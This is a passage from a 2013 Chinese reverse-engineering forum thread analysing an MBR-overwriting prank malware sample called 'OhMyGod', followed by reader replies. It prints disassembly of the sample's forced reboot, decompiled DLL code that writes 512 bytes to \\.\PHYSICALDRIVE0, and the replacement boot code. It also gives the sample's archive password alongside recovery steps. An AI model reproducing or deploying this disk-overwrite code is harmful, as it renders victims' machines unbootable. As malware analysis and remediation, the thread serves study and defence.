0x8000                              ; /dwFreeType = 8000 (32768.) 004013C0  |.  6A 00         push 0x0                                 ; |dwSize = 0 004013C2  |.  55            push ebp                                 ; |lpAddress 004013C3  |.  56            push esi                                 ; |hProcess 004013C4  |.  FF15 38804000 call dword ptr ds:[<&KERNEL32.VirtualFre>; \VirtualFreeEx 004013CA  |.  56            push esi                                 ; /hObject 004013CB  |.  8B35 B0804000 mov esi,dword ptr ds:[<&KERNEL32.CloseHa>; |kernel32.CloseHandle 004013D1  |.  FFD6          call esi                                 ; \CloseHandle 004013D3  |.  57            push edi                                 ; /hObject 004013D4  |.  FFD6          call esi                                 ; \CloseHandle 004013D6  |.  5F            pop edi 004013D7  |.  5E            pop esi 004013D8  |.  5D            pop ebp 004013D9  |.  5B            pop ebx 004013DA  |.  81C4 28010000 add esp,0x128 004013E0  \.  C3            retn   看最后一个call   004017E5  |.  E8 B6FCFFFF   call OhMyGod.004014A0 获取系统版本，然后重启，当然MBR被恶意修改了，就不能进入系统了 004014A0  /$  8B4424 04     mov eax,dword ptr ss:[esp+0x4] 004014A4  |.  81EC 94000000 sub esp,0x94 004014AA  |.  85C0          test eax,eax 004014AC  |.  74 13         je XOhMyGod.004014C1 004014AE  |.  83F8 02       cmp eax,0x2 004014B1  |.  74 0E         je XOhMyGod.004014C1 004014B3  |.  83F8 01       cmp eax,0x1 004014B6  |.  74 09         je XOhMyGod.004014C1 004014B8  |.  33C0          xor eax,eax 004014BA  |.  81C4 94000000 add esp,0x94 004014C0  |.  C3            retn 004014C1  |>  57            push edi 004014C2  |.  B9 24000000   mov ecx,0x24 004014C7  |.  33C0          xor eax,eax 004014C9  |.  8D7C24 08     lea edi,dword ptr ss:[esp+0x8] 004014CD  |.  F3:AB         rep stos dword ptr es:[edi] 004014CF  |.  8D4424 04     lea eax,dword ptr ss:[esp+0x4] 004014D3  |.  C74424 04 940>mov dword ptr ss:[esp+0x4],0x94 004014DB  |.  50            push eax                                 ; /pVersionInformation 004014DC  |.  FF15 5C804000 call dword ptr ds:[<&KERNEL32.GetVersion>; \GetVersionExA 004014E2  |.  85C0          test eax,eax 004014E4  |.  5F            pop edi 004014E5  |.  75 07         jnz XOhMyGod.004014EE 004014E7  |.  81C4 94000000 add esp,0x94 004014ED  |.  C3            retn 004014EE  |>  837C24 10 02  cmp dword ptr ss:[esp+0x10],0x2 004014F3  |.  75 05         jnz XOhMyGod.004014FA 004014F5  |.  E8 F6FEFFFF   call OhMyGod.004013F0 004014FA  |>  6A 00         push 0x0                                 ; /Reserved = 0 004014FC  |.  6A 06         push 0x6                                 ; |Options = EWX_REBOOT|EWX_FORCE 004014FE  |.  FF15 54814000 call dword ptr ds:[<&USER32.ExitWindowsE>; \ExitWindowsEx 00401504  |.  81C4 94000000 add esp,0x94 0040150A  \.  C3            retn   在看MBR之前，我们看下那个dll，用IDA静态看下 发现只有DllMain一个函数,发现是这个样子 strcpy((char *)FileName, "\\\\.\\PHYSICALDRIVE0"); CreateFileA(FileName, 0xC0000000u, 0, 0, 3u, 0x80u, 0); WriteFile(hObject, &Buffer, 0x200u, &NumberOfBytesWritten, 0);   此时我们再用winhex到处MBR，IDA静态分析下，详细的MBR学习请转帖到willJ大大的MBR学习哦 ;org 7C00h seg000:7C00                                         assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing seg000:7C00 B8 12 00                                mov     ax, 12h         ; 设置显示器模式，12H：640×480 16色 seg000:7C03 CD 10                                   int     10h             ; - VIDEO - SET VIDEO MODE seg000:7C03                                                                 ; AL = mode seg000:7C05 BD 18 7C                                mov     bp, 7C18h       ; es:bp字符串的地址 seg000:7C08 B9 13 00                                mov     cx, 13h         ; 显示字符串长度为0x13 seg000:7C0B B8 01 13                                mov     ax, 1301h       ; ah = 13h,al = 01h 表示执行int10中断的13号程序功能（在Teletype模式下显示字符串） seg000:7C0E BB 0C 00                                mov     bx, 0Ch         ; bl=0Ch，表示属性，背景色为黑色，字体颜色为淡红色 seg000:7C11 BA 00 00                                mov     dx, 0           ; dh = 0；表示第0列第0行 seg000:7C14 CD 10                                   int     10h             ; - VIDEO - WRITE STRING (AT,XT286,PS,EGA,VGA) seg000:7C14                                                                 ; AL = mode, BL = attribute if AL bit 1 clear, BH = display page number seg000:7C14                                                                 ; DH,DL = row,column of starting cursor position, CX = length of string seg000:7C14                                                                 ; ES:BP -> start of string seg000:7C14                         ; --------------------------------------------------------------------------- seg000:7C16 E2 FE                                   loop    loc_7C16        ; 死循环 seg000:7C16                         ; --------------------------------------------------------------------------- seg000:7C18 68 61 63 6B 65 64 20 62+aHackedByJingui db 'hacked by JinGuiZi      ' ; 要显示的字符串   MBR最后两位0x55，0xAA seg000:7DFE 55                                      db  55h ; U seg000:7DFF AA                                      db 0AAh ;

最后看下效果

效果

预防和修复
MBR恢复可以看下http://www.52pojie.cn/thread-188123-1-1.htmlwillJ大大的这个帖子
删除系统目下的GuiZi.exe以及windows目录下的rand().dll
注册表进行恢复

附件：
一个简单的恶意代码分析.doc (181.5 KB, 下载次数: 37)

2013-7-11 11:40 上传

点击文件名下载附件
文档

OhMyGod.7z (54.78 KB, 下载次数: 68)

2013-7-11 11:40 上传

点击文件名下载附件
样本

  密码 "52pojie"

MBR_Jin.7z (187 Bytes, 下载次数: 37)

2013-7-11 11:40 上传

点击文件名下载附件
idb

PS：XP成功，win7完蛋。

总结：此样本的方法就是创建一个dll，去注入桌面这个万能的进程，当我们操作桌面的时候，就成功加载这个dll，就对MBR进行写入，然后动态获取MessageBoxA的地址用的shellcode的方式（读取输入表），获取，比较隐秘，不过对于动态调试就无力了,是一种hook API的方法，也学习了一种方法，很不错。其他的应该都是干扰信息，我们不用理会。

a826463749

慢慢学吧

wuaixuexi

楼主 对函数分析的很透彻 ，对汇编 也很了解 ，支持你  

No_what_can't

好好 好 不错

逍遥枷锁

大家可不要利用这些来做坏事，结果会很严重

这只猪

纯膜拜加支持，这得多好的汇编理解啊。。。

逍遥枷锁

那这个给一些一窍不懂电脑的打开，这不是以为电脑坏了，有要钱去修了，很悲催。

willJ

这个样本是金龟子写的？
那些注册表操作，服务操作有什么目的？
整个样本的目的只是恶作剧？目的？

JoyChou

willJ 发表于 2013-7-11 20:49
这个样本是金龟子写的？
那些注册表操作，服务操作有什么目的？
整个样本的目的只是恶作剧？目的？

嗯。恶搞。注册表和服务那些感觉都是迷惑人的。

JoyChou

wuaixuexi 发表于 2013-7-11 11:35
楼主 对函数分析的很透彻 ，对汇编 也很了解 ，支持你

一起加油吧